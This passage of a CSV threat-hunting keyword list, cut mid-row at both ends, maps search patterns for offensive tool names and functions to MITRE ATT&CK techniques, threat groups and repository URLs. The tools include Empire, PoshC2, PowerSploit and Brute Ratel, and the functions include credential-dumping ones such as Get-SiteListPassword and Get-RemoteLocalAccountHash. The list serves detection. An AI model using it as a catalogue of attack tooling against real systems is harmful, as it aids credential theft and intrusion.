Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*getprivs.bin*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*getprivs.exe*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*get-process *amsi.dll*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Get-RBCD-Threaded*,offensive_tool_keyword,Get-RBCD-Threaded,Tool to discover Resource-Based Constrained Delegation attack paths in Active Directory Environments,T1558 - T1208 - T1550 - T1484 - T1486,TA0007 - TA0008,N/A,N/A,Exploitation tools,https://github.com/FatRodzianko/Get-RBCD-Threaded,1,1,N/A,N/A,2,115,19,2021-08-10T23:29:48Z,2019-12-21T00:08:28Z -*Get-RegistryAlwaysInstallElevated*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-RegistryAlwaysInstallElevated*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-RegistryAutoLogon*,greyware_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-RegistryAutoLogon*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*GetRektBoy724/SharpUnhooker*,offensive_tool_keyword,SharpUnhooker,C# Based Universal API Unhooker,T1055.012 - T1070.004 - T1562.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/GetRektBoy724/SharpUnhooker,1,1,N/A,9,4,365,103,2022-02-18T13:11:11Z,2021-05-17T01:33:38Z -*Get-RemoteCachedCredential*,offensive_tool_keyword,AD exploitation cheat sheet,Get cached credentials (if any),T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Get-RemoteCachedCredential*,offensive_tool_keyword,DAMP,The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.,T1222 - T1222.002 - T1548 - T1548.002,TA0005 ,N/A,N/A,Persistence,https://github.com/HarmJ0y/DAMP,1,1,N/A,10,4,356,78,2019-07-25T21:18:37Z,2018-04-06T22:13:58Z -*Get-RemoteDesktopUserSessionList*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Get-RemoteDesktopUserSessionList.*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Get-RemoteLocalAccountHash*,offensive_tool_keyword,AD exploitation cheat sheet,Get local account hashes,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Get-RemoteLocalAccountHash*,offensive_tool_keyword,DAMP,The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.,T1222 - T1222.002 - T1548 - T1548.002,TA0005 ,N/A,N/A,Persistence,https://github.com/HarmJ0y/DAMP,1,1,N/A,10,4,356,78,2019-07-25T21:18:37Z,2018-04-06T22:13:58Z -*Get-RemoteMachineAccountHash*,offensive_tool_keyword,AD exploitation cheat sheet,Get machine account hash for silver ticket attack,T1110,TA0006,N/A,N/A,Credential Access,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*getremoteprocesslisting*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Get-RickAstley*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-RickAstley.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-RickAstley.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1053,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*gets4uticket.py*,offensive_tool_keyword,PKINITtools,Tools for Kerberos PKINIT and relaying to AD CS,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/dirkjanm/PKINITtools,1,1,N/A,N/A,5,493,68,2023-04-28T00:28:37Z,2021-07-27T19:06:09Z -*Get-SccmCacheFolder*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*get-screenshot*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*get-screenshotallwindows*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Get-SecurityPackages.ps1*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-Vnc.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-ShadowCopies*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*GetShellcode(*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,0,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*Get-SitelistFields*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-SiteListPassword.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-SiteListPassword*,greyware_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Get-SiteListPassword*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-SiteListPassword*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Get-SiteListPassword.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Get-SiteListPassword*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1121,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*getsploit*,offensive_tool_keyword,getsploit,Command line search and download tool for Vulners Database inspired by searchsploit. It allows you to search online for the exploits across all the most popular collections: Exploit-DB. Metasploit. Packetstorm and others. The most powerful feature is immediate exploit source download right in your working path.,T1583 - T1584 - T1586,TA0007,N/A,N/A,Exploitation tools,https://github.com/vulnersCom/getsploit,1,0,N/A,N/A,10,1667,255,2023-03-27T15:18:55Z,2017-06-04T09:31:44Z -*Get-SPN.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1114,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*get-spns All*,offensive_tool_keyword,DelegationBOF,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.,T1098 - T1214 - T1552,TA0006,N/A,N/A,Credential Access,https://github.com/IcebreakerSecurity/DelegationBOF,1,0,N/A,N/A,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z -*get-spns ASREP*,offensive_tool_keyword,DelegationBOF,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.,T1098 - T1214 - T1552,TA0006,N/A,N/A,Credential Access,https://github.com/IcebreakerSecurity/DelegationBOF,1,0,N/A,N/A,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z -*get-spns spns*,offensive_tool_keyword,DelegationBOF,This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.,T1098 - T1214 - T1552,TA0006,N/A,N/A,Credential Access,https://github.com/IcebreakerSecurity/DelegationBOF,1,0,N/A,N/A,10,115,21,2022-05-04T14:00:36Z,2022-03-28T20:14:24Z -*Get-SQLInstanceDomain*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for 